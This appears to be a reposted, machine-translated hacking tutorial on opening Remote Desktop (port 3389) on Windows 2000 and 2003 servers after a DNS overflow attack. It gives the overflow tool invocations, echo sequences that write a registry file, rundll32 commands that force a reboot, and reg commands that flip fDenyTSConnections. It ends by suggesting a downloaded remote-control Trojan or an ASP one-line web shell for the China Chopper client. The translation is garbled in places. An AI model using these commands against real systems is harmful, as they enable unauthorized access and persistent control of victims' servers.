Enable remote Windows System port 3389 and windows3389

Source: Internet
Author: User

Enable remote Windows System port 3389 and windows3389

 

1. Win7, Win2003, and XP systems
Reg add hklm \ SYSTEM \ CurrentControlSet \ Control \ Terminal "" Server/v fDenyTSConnections/t REG_DWORD/d 00000000/f

 

2. System 2000

This section briefly describes how to launch DNS overflow attacks. I use dns.exe, and run it under CMD to view its usage parameters and other information. Run the "dns-s IP" command to check whether the target IP Address has a DNS overflow vulnerability. If yes, the system will launch an overflow attack, after "dns-t 2000all IP 1207" is executed, the system prompts you to check the shell of port 1100 returned. "Telnet IP 1100" successfully returns the response shell. Note that the directory is c:/WINNT/system32. Next we need to write a 3389. reg registry file using the "echo" command. Copy the following code line by line to the shell window and then run the following command:

Echo Windows Registry Editor Version 5.00> 3389.reg
Echo.> 3389.reg
Echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/netcache]> 3389.reg
Echo "Enabled" = "0"> 3389.reg
Echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon]> 3389.reg
Echo "ShutdownWithoutLogon" = "0"> 3389.reg
Echo [HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/Installer]> 3389.reg
Echo "EnableAdminTSRemote" = dword: 00000001> 3389.reg
Echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]> 3389.reg
Echo "TSEnabled" = dword: 00000001> 3389.reg
Echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermDD]> 3389.reg
Echo "Start" = dword: 00000002> 3389.reg
Echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/TermService]> 3389.reg
Echo "Start" = dword: 00000002> 3389.reg
Echo [HKEY_USERS/. DEFAULT/Keyboard Layout/Toggle]> 3389.reg
Echo "Hotkey" = "1"> 3389.reg
Echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]> 3389.reg
Echo "PortNumber" = dword: 00000D3D> 3389.reg
Echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp]> 3389.reg
Echo "PortNumber" = dword: 00000D3D> 3389.reg

The ">" symbol overwrites the written file. If this file is not found, the file is created. If yes, the original content is overwritten. ">" Is the append write, that is, the content written after the original file content. The content is written to the 3389. reg file! Note that the second line is used to write a line of space, because the format of the. reg file must be so! After successful writing, perform the import operation and run "regedit/s 3389.reg ". In this way, the Registry file is successfully imported into the registry. However, it should be noted that do not enter any wrong character in Shell shell, otherwise it will not be executed. We recommend that you first lay it in notepad, ensure that it is correct, and then copy it to the shell window for execution. Then, restart the target host using the following method. Run the following code in mongoshell:

@ Echo off & cd/d % temp % & echo [version]> {out}. inf
(Set inf = InstallHinfSection DefaultInstall)
Echo signature = $ chicago $ >>{ out}. inf
Echo [defainstall install] >>{ out}. inf
Rundll32 setupapi, % inf % 1% temp %/{out}. inf r

Copy the preceding five lines of code to mongoshell in sequence, and press enter once. After all the five lines are executed, the server restarts. Of course, there are many ways to restart the server, such as killing key processes in the system and simulating code keys. If there is no accident, after the server is restarted, connect to the target and find that the remote desktop service is enabled successfully. Now, the remote desktop service is successfully enabled under the mongoshell returned after the Windows 2000 operating system overflows.

3. System 2003

Compared with the 2000 system, it is easier to enable the remote desktop service in shell. At least no restart is required! The first method is to use the "echo" command to write a 3389. reg file, and then "regedit/s 3389.reg" to import the Registry file to enable it. This is relatively simple and is similar to the 2000 enabling method described above. Copy the following code line by line to the shell window and press enter to execute the line:

Echo Windows Registry Editor Version 5.00> 3389.reg
Echo.> 3389.reg
Echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server]> 3389.reg
Echo "fDenyTSConnections" = dword: 00000000> 3389.reg
Echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/Wds/rdpwd/Tds/tcp]> 3389.reg
Echo "PortNumber" = dword: 00000d3d> 3389.reg
Echo [HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp]> 3389.reg
Echo "PortNumber" = dword: 00000d3d> 3389.reg

After completing the preceding operations, execute the "regedit/s 3389.reg" import to take effect! However, this method is relatively cumbersome. We can also use another simple method to enable the remote desktop service. Before introducing another operation method, we should first familiarize ourselves with one of the most critical registry key values for Remote Desktop Services in the 2003 system.
In "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"

The value "fDenyTSConnections" indicates that the value is 1 or 0. Disable the remote desktop service when the value is 1 and enable the remote desktop service when the value is 0. In other words, you can enable the remote desktop service by changing the key registry key value data in the cmdshell! Fortunately, there is a "reg" command in 2003 that can do this completely. Here we look for a server with an operating system of 2003, and return an external shell after overflow in the same way as described above. When we try to connect, we will find that the connection cannot be connected at all. The following describes how to use the "reg" command to enable the remote desktop service. Run:

Reg query "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"

We found that the "fDenyTSConnections" key value data is "0x1 ". This is 1 of The hexadecimal number. As mentioned above, if the data is 1, the remote desktop service is not enabled. All we need to do is change "0x1" to "0x0 "! You cannot directly use "reg add". You must delete the original key value before adding it! Run the following command in cmdshell:

Reg delete "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"/v fDenyTSConnections

Will you ask if "you want to delete the registry value fDenyTSConnections", Of course Yes. Run the following command:

Reg add "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"/v fDenyTSConnections/t REG_DWORD/d 0

The operation is successful. In this way, the value of "fDenyTSConnections" is changed to "0x0". We can execute:

Reg query "HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server"

The data has been successfully changed. Now let's try to connect to server 3389 and find that the connection is successful. Create a user to play with it. At this point, the method for enabling remote desktop service by using mongoshell Under 2003 is also described.


You do not have to enable the remote desktop service in shell.
You can echo a vbs file, download the Remote Control Trojan, and then run the trojan in mongoshell to connect.
Also, check whether the target IP address is bound to a website. If yes, find the website directory and use echo as a Trojan (command: echo "<% execute request (" cmd ") %> "> WEB path/test. asp), connect with the cutting knife in China, upload the trojan, upload the 3389 tool, and then enable it.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.